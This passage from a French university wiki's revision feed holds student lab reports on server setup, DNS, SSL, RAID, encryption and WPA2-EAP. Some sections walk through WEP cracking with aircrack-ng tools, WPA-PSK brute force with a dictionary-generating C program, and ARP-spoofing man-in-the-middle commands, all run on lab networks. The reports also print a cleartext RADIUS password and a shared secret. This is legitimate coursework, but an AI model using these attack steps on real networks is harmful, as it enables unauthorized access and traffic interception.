=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le message du jour, on crée un role &amp;quot;motd&amp;quot; qui va copier notre fichier dans /etc/motd sur notre autre machine&lt;br /&gt;
&lt;br /&gt;
Dockerfile&lt;br /&gt;
&lt;br /&gt;
 FROM httpd&lt;br /&gt;
 COPY ./index.html /usr/local/apache2/htdocs/&lt;br /&gt;
 CMD [ &amp;quot;httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot; ]&lt;br /&gt;
&lt;br /&gt;
 docker build -t web .&lt;br /&gt;
&lt;br /&gt;
 docker run -d web&lt;br /&gt;
&lt;br /&gt;
fichier main.yml&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Install docker on host&amp;quot;&lt;br /&gt;
   hosts: Install_docker&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   vars :&lt;br /&gt;
           &amp;quot;ansible_distribution&amp;quot;: &amp;quot;Debian&amp;quot;&lt;br /&gt;
           &amp;quot;ansible_distribution_release&amp;quot;: &amp;quot;buster&amp;quot; &lt;br /&gt;
   roles:&lt;br /&gt;
           - role: geerlingguy.docker&lt;br /&gt;
 &lt;br /&gt;
 - name: &amp;quot;Setup Docker&amp;quot;&lt;br /&gt;
   hosts: HTTPD&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   roles:&lt;br /&gt;
           - role: HTTPD&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Option_Cybers%C3%A9curit%C3%A9_2020/2021&amp;diff=55312</id>
		<title>Option Cybersécurité 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Option_Cybers%C3%A9curit%C3%A9_2020/2021&amp;diff=55312"/>
				<updated>2021-01-18T07:39:21Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Documents ==&lt;br /&gt;
&lt;br /&gt;
Le module de cybersécurité se présente sous la forme d'un certain nombre d'énigmes ou de puzzles à résoudre.&lt;br /&gt;
&lt;br /&gt;
Vous avez ici la liste des supports correspondants :&lt;br /&gt;
* Pour tous les participants un [https://ctf.plil.fr/challenges?category=option-cyberscurit-20202021 &amp;quot;jeu du drapeau&amp;quot;] comportant 10 niveaux. Certains niveaux sont difficiles mais pas compliqués et ne demandent donc pas d'expertise particulière en informatique, électronique ou traitement du signal. D'autres niveaux sont clairement compliqués, tentez !&lt;br /&gt;
* Pour ceux qui n'en ont pas déjà eu l'occasion, essayez de pénétrer sur le serveur de l'application Web [http://honey.plil.info]. Comme seule indication il vous est indiqué que le mot de passe de l'administrateur suit le même tropisme que celui des machines Zabeth. A vous de tester les attaques habituelles sur les sites Web utilisant des bases de données.&lt;br /&gt;
* Attaques réseau : [[Manipulations Web et Mail]]&lt;br /&gt;
* Attaques objects connectés : Vous disposez d'un &amp;quot;réseau&amp;quot; d'objets composé d'un Arduino Uno standard et d'un émetteur/récepteur FSK RFM69HCW. Plusieurs programmes transmettant des données peuvent être implantés sur les Arduino. Le but est de rechercher la clé de chiffrement et/ou les données envoyées. Pour cela, vous aurez physiquement accès à l'objet connecté pour pouvoir tenter de dumper la mémoire, lire des bus, ou intercepter le flux de donnée radio.&lt;br /&gt;
&lt;br /&gt;
Les supports de cours sont disponibles à l'adresse [http://www.cyberedu.fr/pages/supports/]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
Ecrivez vos noms sous le format exact &amp;quot;Prénom Nom&amp;quot;, séparez vos noms par des virgules.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Projet !! Elèves&lt;br /&gt;
|- &lt;br /&gt;
| [[Cyber 2020/2021 G1]] || Loïc RINGOT &amp;amp; Pierre SANCHEZ&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G2]] || Tanguy VIEUBLED &amp;amp; Paul VERNIER&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G3]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G4]] || Quentin BARGIBANT &amp;amp; Robin COUBELLE&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G5]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G6]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G7]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G8]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G9]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G10]] || Thomas MERTZ &amp;amp; Sébastien DARDENNE&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G11]] || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| [[Cyber 2020/2021 G12]] || Guillaume ROUILLÉ &amp;amp; Evan GURY&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54811</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54811"/>
				<updated>2020-12-17T12:11:18Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
